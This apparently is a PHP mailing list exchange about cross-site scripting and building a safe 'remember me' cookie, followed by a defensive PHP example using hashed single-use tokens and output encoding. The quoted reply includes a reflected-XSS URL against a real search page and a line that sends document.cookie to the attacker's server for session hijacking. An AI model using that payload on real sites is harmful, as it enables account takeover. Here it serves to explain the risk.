Thanks heaps John. So as a basic rule, having a uid and pwd stored as session variables is NOT the problem, but storing the uid and/or pwd in a cookie on the browser is just plain asking for it :)
So, how do you implement a "remember me" safely? Setting JUST the uid in a cookie prevents people from knowing the pwd, but I have to validate the user before granting access to pages... without a pwd, it seems, errrr, impossible :)

Justin

> Just search google for Cross Site Scripting and you'll find a ton of
> articles about that specifically. It all comes down to validating user
> input and not displaying it directly back to the screen.
>
> Here is a link, for example, that'll pop up your cookies for cnn.com.
> (watch the wrapping!)
>
> http://cnn.looksmart.com/r_search?l&izch&qc=&col=cnni&qm=0&st=1&nh=10&rf=1&venue=all&keyword=&qp=&search=0&key=%3Cscript%3Ealert%28%27Hi%27%29%3B%3C%2Fscript%3E
>
> Now, how about instead of just executing alert("Hi"), I do a
> location.href='www.myserver.com?var='+document.cookie; and send myself
> your cookie. Then I just simply make my cookie match yours, and poof,
> I'm you. :)
>
> It all comes down to validating user input and never showing it directly
> back to the browser/screen.
>
> Similar problems exist for variables you use in database queries...
>
> ---John Holmes...

--
PHP General Mailing List (http://www.php.net/)
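One way to do the "remember me" Justin asks about, plus the output encoding John's reply comes down to. This is an added example, not code from either poster: the cookie carries only a random selector and a random validator, never the uid or pwd; the server keeps the selector next to a hash of the validator, compares in constant time, and replaces the pair on every use. The cookie name, the 30-day lifetime, the in-memory `$rememberStore` array standing in for a database table, and the fixed clock in the demo are all assumptions. Needs PHP 7.3 or later for the array form of `setcookie()`.

```php
<?php
// Added example (not from the thread). A "remember me" token that keeps uid and
// password out of the cookie entirely. Storage is a plain array here as a stand-in
// for a table with columns (selector, validator_hash, user_id, expires) - assumption.

const REMEMBER_COOKIE   = 'remember_me';     // cookie name (assumed)
const REMEMBER_LIFETIME = 30 * 24 * 3600;    // 30 days (assumed)

// Hypothetical persistent store: selector => ['validator_hash', 'user_id', 'expires'].
$rememberStore = [];

function issueRememberToken(array &$store, int $userId, int $now): string
{
    // Two independent random values: the selector finds the row, the validator proves
    // possession. Only a hash of the validator is stored, so a dumped table cannot be
    // turned straight back into working cookies.
    $selector  = bin2hex(random_bytes(12));
    $validator = bin2hex(random_bytes(32));
    $store[$selector] = [
        'validator_hash' => hash('sha256', $validator),
        'user_id'        => $userId,
        'expires'        => $now + REMEMBER_LIFETIME,
    ];
    return $selector . ':' . $validator;
}

function setRememberCookie(string $token, int $now): void
{
    // HttpOnly keeps document.cookie (the theft John describes) from reading it,
    // Secure keeps it off plain HTTP, SameSite=Lax limits cross-site sends.
    setcookie(REMEMBER_COOKIE, $token, [
        'expires'  => $now + REMEMBER_LIFETIME,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

function userFromRememberToken(array &$store, string $cookieValue, int $now): ?int
{
    $parts = explode(':', $cookieValue, 2);
    if (count($parts) !== 2 || !isset($store[$parts[0]])) {
        return null;
    }
    [$selector, $validator] = $parts;
    $row = $store[$selector];
    if ($row['expires'] < $now) {
        unset($store[$selector]);            // expired: drop the row
        return null;
    }
    // Constant-time compare so response timing does not leak how many bytes matched.
    if (!hash_equals($row['validator_hash'], hash('sha256', $validator))) {
        unset($store[$selector]);            // right selector, wrong validator: revoke it
        return null;
    }
    // Single use: a copied cookie stops working once the real user has come back.
    unset($store[$selector]);
    return $row['user_id'];
}

// John's XSS link works because the search key is echoed straight back into the page.
// Encoding it for HTML context is what stops the <script> from running.
function renderSearchKey(string $key): string
{
    return 'You searched for: ' . htmlspecialchars($key, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Demo with a fixed clock (constructed). setRememberCookie() is not called here
// because there is no HTTP response to attach the cookie to on the command line.
$now   = 1700000000;
$token = issueRememberToken($rememberStore, 42, $now);
var_dump(userFromRememberToken($rememberStore, $token, $now));    // first use: the user id
var_dump(userFromRememberToken($rememberStore, $token, $now));    // replay: rejected
var_dump(userFromRememberToken($rememberStore, 'no:such', $now)); // unknown selector: rejected
echo renderSearchKey("<script>alert('Hi');</script>"), "\n";
```

On a successful lookup the login code would start the normal session for `$row['user_id']`, call `issueRememberToken()` again and `setRememberCookie()` with the fresh pair; on logout it should delete the user's rows so an old cookie is dead server-side, not just in the one browser that clicked "log out".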

